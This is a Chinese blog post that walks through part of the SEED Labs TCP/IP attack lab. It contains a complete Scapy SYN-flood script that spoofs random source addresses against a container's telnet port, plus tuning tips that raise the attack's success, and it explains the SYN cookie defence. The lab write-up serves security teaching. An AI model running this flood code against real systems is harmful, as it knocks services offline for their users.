

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="kaikaikai">
  <meta name="keywords" content="">
  
    <meta name="description" content="1. Overview 本实验室的学习目标是让学生获得有关漏洞以及针对这些漏洞的攻击的第一手经验。智者从错误中学习。在安全教育中，我们研究导致软件漏洞的错误。研究过去的错误不仅能帮助学生理解为什么系统容易受到攻击，为什么一个看似微不足道的错误会变成一场灾难，为什么需要许多安全机制。更重要的是，它还能帮助学生了解漏洞的常见模式，从而避免今后再犯类似的错误。此外，以漏洞为案例，学生可以学习安全设计、">
<meta property="og:type" content="article">
<meta property="og:title" content="TCP&#x2F;IP Attack">
<meta property="og:url" content="http://example.com/2023/11/22/SEED-LABS/Network%20Security/TCP_IP%20Attack/index.html">
<meta property="og:site_name" content="kaikaikai&#39;s blog">
<meta property="og:description" content="1. Overview 本实验室的学习目标是让学生获得有关漏洞以及针对这些漏洞的攻击的第一手经验。智者从错误中学习。在安全教育中，我们研究导致软件漏洞的错误。研究过去的错误不仅能帮助学生理解为什么系统容易受到攻击，为什么一个看似微不足道的错误会变成一场灾难，为什么需要许多安全机制。更重要的是，它还能帮助学生了解漏洞的常见模式，从而避免今后再犯类似的错误。此外，以漏洞为案例，学生可以学习安全设计、">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2023-11-22T02:30:23.000Z">
<meta property="article:modified_time" content="2023-12-28T07:01:08.881Z">
<meta property="article:author" content="kaikaikai">
<meta name="twitter:card" content="summary_large_image">
  
  
  
  <title>TCP/IP Attack - kaikaikai&#39;s blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.5","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="TCP/IP Attack"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2023-11-22 10:30" pubdate>
          2023年11月22日 上午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          13k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          110 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">TCP/IP Attack</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="overview">1. Overview</h1>
<p>本实验室的学习目标是让学生获得有关漏洞以及针对这些漏洞的攻击的第一手经验。智者从错误中学习。在安全教育中，我们研究导致软件漏洞的错误。研究过去的错误不仅能帮助学生理解为什么系统容易受到攻击，为什么一个看似微不足道的错误会变成一场灾难，为什么需要许多安全机制。更重要的是，它还能帮助学生了解漏洞的常见模式，从而避免今后再犯类似的错误。此外，以漏洞为案例，学生可以学习安全设计、安全编程和安全测试的原则。</p>
<p>TCP/IP
协议中的漏洞代表了协议设计和实现中的一种特殊类型的漏洞；这些漏洞提供了宝贵的一课，让我们了解为什么要从一开始就设计安全措施，而不是事后才添加。此外，研究这些漏洞有助于学生理解网络安全的挑战以及为什么需要采取许多网络安全措施。
在本实验室中，学生将对 TCP 进行多次攻击。本实验涵盖以下主题：</p>
<ul>
<li>TCP协议</li>
<li>TCP SYN洪水攻击和SYN cookie</li>
<li>TCP重置攻击</li>
<li>TCP会话劫持攻击</li>
<li>反向shell</li>
</ul>
<h1 id="lab-environment">2. Lab Environment</h1>
<p>在本实验室中，我们至少需要三台机器。我们使用容器来搭建实验环境。图 1
描述了实验室设置。我们将使用攻击者容器发起攻击，同时使用其他三个容器作为受害者和用户机器。我们假设所有这些机器都在同一个局域网中。学生也可以使用三台虚拟机来完成这个实验，但使用容器会更方便。</p>
<figure>
<img
src="https://raw.githubusercontent.com/kaikaikai7/BlogImage/main/img/202312281500436.png" srcset="/img/loading.gif" lazyload
alt="image-20231228142943179" />
<figcaption aria-hidden="true">image-20231228142943179</figcaption>
</figure>
<h2 id="container-setup-and-commands">2.1 Container Setup and
Commands</h2>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs bash">$ docker-compose build <span class="hljs-comment"># Build the container image</span><br>$ docker-compose up <span class="hljs-comment"># Start the container</span><br>$ docker-compose down <span class="hljs-comment"># Shut down the container</span><br>// Aliases <span class="hljs-keyword">for</span> the Compose commands above<br>$ dcbuild <span class="hljs-comment"># Alias for: docker-compose build</span><br>$ dcup <span class="hljs-comment"># Alias for: docker-compose up</span><br>$ dcdown <span class="hljs-comment"># Alias for: docker-compose down</span><br><br>$ dockps // Alias <span class="hljs-keyword">for</span>: docker ps --format <span class="hljs-string">&quot;&#123;&#123;.ID&#125;&#125; &#123;&#123;.Names&#125;&#125;&quot;</span><br>$ docksh &lt;<span class="hljs-built_in">id</span>&gt; // Alias <span class="hljs-keyword">for</span>: docker <span class="hljs-built_in">exec</span> -it &lt;<span class="hljs-built_in">id</span>&gt; /bin/bash<br></code></pre></td></tr></table></figure>
<h2 id="about-the-attacker-container">2.2 About the Attacker
Container</h2>
<p>在本实验室中，我们可以使用<strong>虚拟机或攻击者容器</strong>作为攻击者机器。如果查看
Docker Compose
文件，你会发现攻击者容器的配置与其他容器不同。以下是不同之处：</p>
<ul>
<li><p>共享文件夹。当我们使用攻击者容器发动攻击时，需要将攻击代码放在攻击者容器内。在虚拟机中编辑代码比在容器中更方便，因为我们可以使用自己喜欢的编辑器。为了让虚拟机和容器共享文件，我们使用
Docker 卷在虚拟机和容器之间创建了一个共享文件夹。如果查看 Docker Compose
文件，你会发现我们在某些容器中添加了以下条目。它表示将主机（即虚拟机）上的
./volumes 文件夹挂载到容器内的 /volumes 文件夹。我们将在 ./volumes
文件夹（虚拟机上）中编写代码，以便在容器内使用它们。</p>
<figure>
<img
src="https://raw.githubusercontent.com/kaikaikai7/BlogImage/main/img/202312281500438.png" srcset="/img/loading.gif" lazyload
alt="image-20231213162539849" />
<figcaption aria-hidden="true">image-20231213162539849</figcaption>
</figure></li>
<li><p>主机模式。在本实验室中，攻击者需要能够嗅探数据包，但在容器内运行嗅探程序会有问题，因为容器实际上是连接到虚拟交换机上的，所以它只能看到自己的流量，而永远看不到其他容器中的数据包。为了解决这个问题，我们为攻击者容器使用主机模式。这样，攻击者容器就能看到所有流量。当容器处于主机模式时，它可以看到主机的所有网络接口，甚至拥有与主机相同的
IP
地址。不过，容器仍是一台独立的机器，因为它的其他命名空间仍与主机不同。</p>
<figure>
<img
src="https://raw.githubusercontent.com/kaikaikai7/BlogImage/main/img/202312281500439.png" srcset="/img/loading.gif" lazyload
alt="image-20231228143145010" />
<figcaption aria-hidden="true">image-20231228143145010</figcaption>
</figure></li>
</ul>
<h2 id="the-seed-account">2.3 The seed Account</h2>
<p>在本实验室中，我们需要从一个容器 telnet
到另一个容器。我们已经在所有容器中创建了一个名为 seed 的账户。它的密码是
dees。你可以远程登录这个账户。</p>
<h1 id="task-1-syn-flooding-attack">3. Task 1: SYN Flooding Attack</h1>
<p>SYN flood 是一种 DoS 攻击形式，攻击者向受害者的 TCP 端口发送许多 SYN
请求，但无意完成 3 路握手过程。攻击者要么使用欺骗的 IP
地址，要么不继续该过程。通过这种攻击，攻击者可以使受害者用于半开连接的队列泛滥，即已完成
SYN、SYN-ACK 但尚未收到最终 ACK
的连接。当队列满时，受害者就不能再接受任何连接。图 2
展示了这种攻击。</p>
<figure>
<img
src="https://raw.githubusercontent.com/kaikaikai7/BlogImage/main/img/202312281500440.png" srcset="/img/loading.gif" lazyload
alt="image-20231228143305079" />
<figcaption aria-hidden="true">image-20231228143305079</figcaption>
</figure>
<p>队列的大小有一个全系统范围的设置。在 Ubuntu
操作系统中，我们可以使用以下命令查看设置。操作系统会根据系统内存大小来设置该值：内存越大，该值就越大。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># sysctl net.ipv4.tcp_max_syn_backlog</span><br>net.ipv4.tcp_max_syn_backlog = 128<br></code></pre></td></tr></table></figure>
<p>我们可以使用
<code>netstat -nat</code>命令来检查队列的使用情况，即与监听端口相关的半开连接的数量。此类连接的状态是
<code>SYN-RECV</code>。如果三方握手结束，则连接状态为<code>ESTABLISHED</code>。</p>
<figure>
<img
src="https://raw.githubusercontent.com/kaikaikai7/BlogImage/main/img/202311221124924.png" srcset="/img/loading.gif" lazyload
alt="image-20231122103814619" />
<figcaption aria-hidden="true">image-20231122103814619</figcaption>
</figure>
<p><strong>SYN Cookie 应对措施</strong>：默认情况下，Ubuntu 的 SYN
泛洪应对措施是开启的。这种机制被称为 SYN Cookie。如果机器检测到受到 SYN
泛洪攻击，它就会启动。在受害者服务器容器中，我们已经关闭了 SYN
Cookie。我们可以使用下面的 sysctl
命令来打开或关闭它：为0关闭，为1打开。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># sysctl -a | grep syncookies (Display the SYN cookie flag)</span><br><span class="hljs-comment"># sysctl -w net.ipv4.tcp_syncookies=0 (turn off SYN cookie)</span><br><span class="hljs-comment"># sysctl -w net.ipv4.tcp_syncookies=1 (turn on SYN cookie)</span><br></code></pre></td></tr></table></figure>
<figure>
<img
src="https://raw.githubusercontent.com/kaikaikai7/BlogImage/main/img/202311221124925.png" srcset="/img/loading.gif" lazyload
alt="image-20231122103935591" />
<figcaption aria-hidden="true">image-20231122103935591</figcaption>
</figure>
<p>要使用 sysctl 更改容器内的系统变量，容器需要配置 "privileged:
true"条目（我们的受害者容器已配置）。如果没有这一设置，我们运行上述命令时将看到以下错误信息。容器没有权限进行更改。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># sysctl -w net.ipv4.tcp_syncookies=1</span><br>sysctl: setting key <span class="hljs-string">&quot;net.ipv4.tcp_syncookies&quot;</span>: Read-only file system<br></code></pre></td></tr></table></figure>
<h2 id="task-1.1-launching-the-attack-using-python">3.1 Task 1.1:
Launching the Attack Using Python</h2>
<p>我们提供了一个名为 synflood.py 的 Python
程序，但故意省略了代码中的一些重要数据。这段代码会发送伪造的 TCP SYN
数据包，其中包含随机生成的源 IP
地址、源端口和序列号。学生应完成代码，然后使用它对目标计算机发起攻击。</p>
<figure>
<img
src="https://raw.githubusercontent.com/kaikaikai7/BlogImage/main/img/202312281500441.png" srcset="/img/loading.gif" lazyload
alt="image-20231228143635084" />
<figcaption aria-hidden="true">image-20231228143635084</figcaption>
</figure>
<p>让攻击运行至少一分钟，然后尝试 telnet
进入受害者机器，看看能否成功。攻击很可能会失败。有多个问题可能导致攻击失败，下面列出了这些问题及解决方法：</p>
<ul>
<li><p>TCP 缓存问题：内核缓解机制。在 Ubuntu 20.04 上，如果 X
机器从未与受害机器建立过 TCP 连接，当 SYN 泛洪攻击发起时，X 机器将无法
telnet 到受害机器。但是，如果在攻击之前，X 机器已经与受害机器建立了
telnet（或 TCP 连接），那么 X 似乎对 SYN 泛洪攻击
"免疫"，可以在攻击期间成功 telnet
到受害机器。受害机器似乎会记住过去的成功连接，并在今后与 "返回
"客户端建立连接时使用这些记忆。这种行为在 Ubuntu 16.04
及更早版本中并不存在。这是由于内核的缓解措施造成的：如果禁用 SYN
Cookie，TCP 会为 "经过验证的目的地 "保留四分之一的积压队列。从 10.9.0.6
向服务器 10.9.0.5 发送 TCP 连接后，我们可以看到服务器记住（缓存）了
10.9.0.6 的 IP
地址，因此当连接来自它们时，它们将使用保留的空位，从而不会受到 SYN
泛洪攻击的影响。要消除这种缓解方法的影响，我们可以在服务器上运行
<code>ip tcp_metrics flush</code>命令。</p>
<figure>
<img
src="https://raw.githubusercontent.com/kaikaikai7/BlogImage/main/img/202312281500442.png" srcset="/img/loading.gif" lazyload
alt="image-20231228143803604" />
<figcaption aria-hidden="true">image-20231228143803604</figcaption>
</figure></li>
<li><p>VirtualBox
问题：如果您从一个虚拟机对另一个虚拟机进行攻击，而不是使用我们的容器设置，请参阅实验指导中的注释
B。如果使用容器设置进行攻击，则不存在此问题。</p></li>
<li><p>TCP 重传问题：发送 SYN+ACK 数据包后，受害机器将等待 ACK
数据包。如果没有及时收到 ACK 包，TCP 就会重传 SYN+ACK
包。重传多少次取决于以下内核参数（默认值为 5）。经过这 5 次重传后，TCP
将从半开放连接队列中删除相应的项目。每删除一个项目，就会有一个空位。您的攻击数据包和合法的
telnet 连接请求数据包将争夺这个空位。我们的 Python
程序可能不够快，因此会输给合法的 telnet
数据包。为了在竞争中获胜，我们可以并行运行多个攻击程序实例。请尝试这种方法，看看能否提高成功率。应该运行多少个实例才能达到合理的成功率？</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># sysctl net.ipv4.tcp_synack_retries</span><br>net.ipv4.tcp_synack_retries = 5<br></code></pre></td></tr></table></figure></li>
<li><p>队列的大小：队列中可以存储多少个半开连接会影响攻击的成功率，可以使用以下命令调整队列的大小（上）。攻击正在进行时，您可以在受害容器上运行以下命令之一（下），查看队列中有多少项目。需要注意的是，队列中四分之一的空间是为
"已证实的目的地 "保留的，因此如果我们将大小设置为 80，其实际容量约为
60。请缩小受害者服务器上半开连接队列的大小，看看能否提高成功率。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># sysctl -w net.ipv4.tcp_max_syn_backlog=80</span><br><br>$ netstat -tna | grep SYN_RECV | <span class="hljs-built_in">wc</span> -l<br>$ ss -n state syn-recv sport = :23 | <span class="hljs-built_in">wc</span> -l<br></code></pre></td></tr></table></figure></li>
</ul>
<p><strong>实验流程：</strong></p>
<ol type="1">
<li><p>使用<code>netstat -nat</code>命令显示所有受害者系统上的TCP连接信息，包括本地地址和端口、远程地址和端口，以及连接的状态。可以看到开启了23号端口，Telnet使用的默认端口也是23。</p>
<figure>
<img
src="https://raw.githubusercontent.com/kaikaikai7/BlogImage/main/img/202311221124926.png" srcset="/img/loading.gif" lazyload
alt="image-20231122104746153" />
<figcaption aria-hidden="true">image-20231122104746153</figcaption>
</figure></li>
<li><p>编写代码：使用Python中的Scapy库来创建和发送TCP SYN数据包，模拟SYN
Flood
攻击。目的IP为受害者容器IP，目的端口为受害者容器开放的23号端口。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment">#!/bin/env python3</span><br><span class="hljs-keyword">from</span> scapy.<span class="hljs-built_in">all</span> <span class="hljs-keyword">import</span> IP, TCP, send<br><span class="hljs-keyword">from</span> ipaddress <span class="hljs-keyword">import</span> IPv4Address<br><span class="hljs-keyword">from</span> random <span class="hljs-keyword">import</span> getrandbits<br><br>ip = IP(dst=<span class="hljs-string">&quot;10.9.0.5&quot;</span>)<br>tcp = TCP(dport=<span class="hljs-number">23</span>, flags=<span class="hljs-string">&#x27;S&#x27;</span>)<br>pkt = ip/tcp<br><br><span class="hljs-keyword">while</span> <span class="hljs-literal">True</span>:<br>	pkt[IP].src = <span class="hljs-built_in">str</span>(IPv4Address(getrandbits(<span class="hljs-number">32</span>))) <span class="hljs-comment"># source iP</span><br>	pkt[TCP].sport = getrandbits(<span class="hljs-number">16</span>) <span class="hljs-comment"># source port</span><br>	pkt[TCP].seq = getrandbits(<span class="hljs-number">32</span>) <span class="hljs-comment"># sequence number</span><br>	send(pkt, verbose = <span class="hljs-number">0</span>)<br></code></pre></td></tr></table></figure></li>
<li><p>root权限运行攻击代码，一分钟后查看受害者机器TCP连接情况，发现已有96条状态为SYN_RECV的TCP连接（SYN_RECV状态表示服务器已经收到客户端发来的连接请求，并回复了确认，正在等待客户端的最终确认，以完成连接的建立），此数量刚好为128的四分之三。</p>
<figure>
<img
src="https://raw.githubusercontent.com/kaikaikai7/BlogImage/main/img/202311221124927.png" srcset="/img/loading.gif" lazyload
alt="image-20231122104910365" />
<figcaption aria-hidden="true">image-20231122104910365</figcaption>
</figure></li>
<li><p>使用HostB容器，向受害者机器发起telnet连接请求，第一次尝试时就成功连接到受害者机器。首次登录能否成功取决于向受害者机器发送连接请求时是否正好有洪泛建立的会话被取消。如果有则可能成功登录，没有则会因为超时无法成功登录。因为我们登录后就进行了登出，所以显示TIME_WAIT状态（TIME_WAIT
是 TCP
协议中的一种状态，表示一个连接已经关闭，但在一定的时间内仍然保持在系统中。在这个状态下，系统等待一段时间，以确保远程端收到连接关闭的消息，同时允许任何延迟的数据包在网络上被丢弃。）</p>
<figure>
<img
src="https://raw.githubusercontent.com/kaikaikai7/BlogImage/main/img/202311221124928.png" srcset="/img/loading.gif" lazyload
alt="image-20231122105004778" />
<figcaption aria-hidden="true">image-20231122105004778</figcaption>
</figure>
<figure>
<img
src="https://raw.githubusercontent.com/kaikaikai7/BlogImage/main/img/202311221124929.png" srcset="/img/loading.gif" lazyload
alt="image-20231122105018135" />
<figcaption aria-hidden="true">image-20231122105018135</figcaption>
</figure></li>
<li><p>退出登录后再次使用telnet进行连接，一次就成功登录。原因分析：如果禁用
SYN Cookie，TCP 会为 "经过验证的目的地 "保留四分之一的积压队列。从
10.9.0.6 向服务器 10.9.0.5 发送 TCP 连接后，服务器记住（缓存）了
10.9.0.6 的 IP
地址，因此当连接来自它们时，它们将使用保留的空位，从而不会受到 SYN
泛洪攻击的影响。</p>
<figure>
<img
src="https://raw.githubusercontent.com/kaikaikai7/BlogImage/main/img/202311221124930.png" srcset="/img/loading.gif" lazyload
alt="image-20231122105045946" />
<figcaption aria-hidden="true">image-20231122105045946</figcaption>
</figure></li>
<li><p>进行改进，提高攻击成功率。改进一：减小半连接队列大小；改进二：提高重传次数；改进三：同时运行两个攻击代码实例。</p>
<figure>
<img
src="https://raw.githubusercontent.com/kaikaikai7/BlogImage/main/img/202311221124931.png" srcset="/img/loading.gif" lazyload
alt="image-20231122105122988" />
<figcaption aria-hidden="true">image-20231122105122988</figcaption>
</figure></li>
<li><p>清空TCP缓存，再次发起攻击。一段时间后，可以看到已有31条状态为SYN_RECV的TCP连接。</p>
<figure>
<img
src="https://raw.githubusercontent.com/kaikaikai7/BlogImage/main/img/202311221124932.png" srcset="/img/loading.gif" lazyload
alt="image-20231122105149178" />
<figcaption aria-hidden="true">image-20231122105149178</figcaption>
</figure></li>
<li><p>尝试连接受害者机器，十余次尝试后，仍未能成功连接，攻击成功率上升。</p>
<figure>
<img
src="https://raw.githubusercontent.com/kaikaikai7/BlogImage/main/img/202311221124933.png" srcset="/img/loading.gif" lazyload
alt="image-20231122105210363" />
<figcaption aria-hidden="true">image-20231122105210363</figcaption>
</figure></li>
</ol>
<h2 id="task-1.2-launch-the-attack-using-c">3.2 Task 1.2: Launch the
Attack Using C</h2>
<p>除了 TCP 缓存问题外，如果我们能以足够快的速度发送欺骗 SYN
数据包，任务 1.1
中提到的所有问题都能迎刃而解。我们在实验设置中提供了一个名为 synflood.c
的 C 程序。请在虚拟机上编译该程序，然后在目标计算机上发起攻击。</p>
<figure>
<img
src="https://raw.githubusercontent.com/kaikaikai7/BlogImage/main/img/202312281500443.png" srcset="/img/loading.gif" lazyload
alt="image-20231228144418432" />
<figcaption aria-hidden="true">image-20231228144418432</figcaption>
</figure>
<p>在发起攻击之前，请将队列大小恢复到初始值。请将结果与使用 Python
程序得到的结果进行比较，并解释两者不同的原因。</p>
<p><strong>实验流程：</strong></p>
<ol type="1">
<li><p>发动攻击，一分钟后，受害者机器半连接队列已有97个连接，约为128的四分之三。</p>
<figure>
<img
src="https://raw.githubusercontent.com/kaikaikai7/BlogImage/main/img/202311221124934.png" srcset="/img/loading.gif" lazyload
alt="image-20231122105256199" />
<figcaption aria-hidden="true">image-20231122105256199</figcaption>
</figure></li>
<li><p>使用user1容器，尝试telnet连接受害者机器，多次尝试仍不能成功连接受害者机器。</p>
<figure>
<img
src="https://raw.githubusercontent.com/kaikaikai7/BlogImage/main/img/202311221124935.png" srcset="/img/loading.gif" lazyload
alt="image-20231122105327108" />
<figcaption aria-hidden="true">image-20231122105327108</figcaption>
</figure></li>
<li><p>C语言实现的TCP SYN flood攻击成功率更高的原因：</p>
<ul>
<li><strong>性能优化</strong>：
C语言是一种编译型语言，它直接被编译成机器码，通常执行速度较快。Python则是解释型语言，它在运行时由解释器解释执行，这可能导致一些性能损失。在网络攻击中，攻击者可能更倾向于使用C语言，以获得更高的执行效率。</li>
<li><strong>底层控制</strong>：
C语言提供对底层系统资源的更直接控制，包括内存管理和底层网络套接字操作。这种直接的控制使得攻击者能够更灵活地调整攻击参数以及处理大量的并发连接，从而提高攻击的成功率。</li>
<li><strong>系统调用</strong>：
C语言允许直接调用系统级别的API，这可能允许攻击者更细粒度地控制网络栈和底层操作。在一些情况下，C语言的直接系统调用可能比Python的高级网络库提供的抽象更为灵活。</li>
</ul></li>
</ol>
<h2 id="task-1.3-enable-the-syn-cookie-countermeasure">3.3 Task 1.3:
Enable the SYN Cookie Countermeasure</h2>
<p>请启用 SYN cookie 机制，并再次运行攻击，比较结果。</p>
<p><strong>实验流程：</strong></p>
<ol type="1">
<li><p>开启SYN
Cookie机制，发动攻击，一段时间后，发现队列中已有128个SYN_RECV状态的连接信息，但由于我们开启了SYN
Cookie，该队列不影响正常连接。</p>
<figure>
<img
src="https://raw.githubusercontent.com/kaikaikai7/BlogImage/main/img/202311221124936.png" srcset="/img/loading.gif" lazyload
alt="image-20231122105456830" />
<figcaption aria-hidden="true">image-20231122105456830</figcaption>
</figure></li>
<li><p>使用HostB容器，尝试用telnet连接受害者机器，成功登录。</p>
<figure>
<img
src="https://raw.githubusercontent.com/kaikaikai7/BlogImage/main/img/202311221124937.png" srcset="/img/loading.gif" lazyload
alt="image-20231122105527058" />
<figcaption aria-hidden="true">image-20231122105527058</figcaption>
</figure></li>
<li><p>原因分析：为了应对SYN
flooding（即客户端只发送SYN包发起握手而不回应ACK完成连接建立，填满server端的半连接队列，让它无法处理正常的握手请求），Linux实现了一种称为SYN
Cookie的机制，通过net.ipv4.tcp_syncookies控制，设置为1表示开启。简单说SYN
Cookie就是将连接信息编码在ISN(initial sequence
number)中返回给客户端，这时server不需要将半连接保存在队列中，而是利用客户端随后发来的ACK带回的ISN还原连接信息，以完成连接的建立，避免了半连接队列被攻击SYN包填满。具体流程如下：</p>
<ul>
<li>在服务器接收到SYN数据包后，它使用只有服务器知道的密钥从数据包中的信息计算密钥散列（H）。</li>
<li>此哈希（H）作为初始序列号从服务器发送到客户端。H称为SYN
cookie。</li>
<li>服务器不会将半开放连接存储在其队列中。</li>
<li>如果客户端是攻击者，H将无法到达攻击者。</li>
<li>如果客户端不是攻击者，则在确认字段中输入H+1。</li>
<li>服务器通过重新计算cookie来检查确认字段中的数字是否有效。</li>
</ul>
<figure>
<img
src="https://raw.githubusercontent.com/kaikaikai7/BlogImage/main/img/202311221124938.png" srcset="/img/loading.gif" lazyload
alt="image-20231122105939209" />
<figcaption aria-hidden="true">image-20231122105939209</figcaption>
</figure></li>
</ol>
<h1 id="task-2-tcp-rst-attacks-on-telnet-connections">4. Task 2: TCP RST
Attacks on telnet Connections</h1>
<figure>
<img
src="https://raw.githubusercontent.com/kaikaikai7/BlogImage/main/img/202311221124939.png" srcset="/img/loading.gif" lazyload
alt="image-20231122110933482" />
<figcaption aria-hidden="true">image-20231122110933482</figcaption>
</figure>
<p>TCP RST 攻击可以终止两个受害者之间建立的 TCP 连接。例如，如果用户 A
和用户 B 之间存在一个已建立的 telnet 连接（TCP），攻击者可以伪造一个来自
A 到 B 的 RST
数据包，从而中断这个现有的连接。为了成功执行此攻击，攻击者需要正确构造
TCP RST 数据包。</p>
<p>在这个任务中，你需要从虚拟机发起一个 TCP RST 攻击，以中断 A 和 B
之间的一个已存在的 telnet
连接，它们是容器。为了简化实验，我们假设攻击者和受害者位于同一个局域网中，即攻击者能够观察到
A 和 B 之间的 TCP 通信流量。</p>
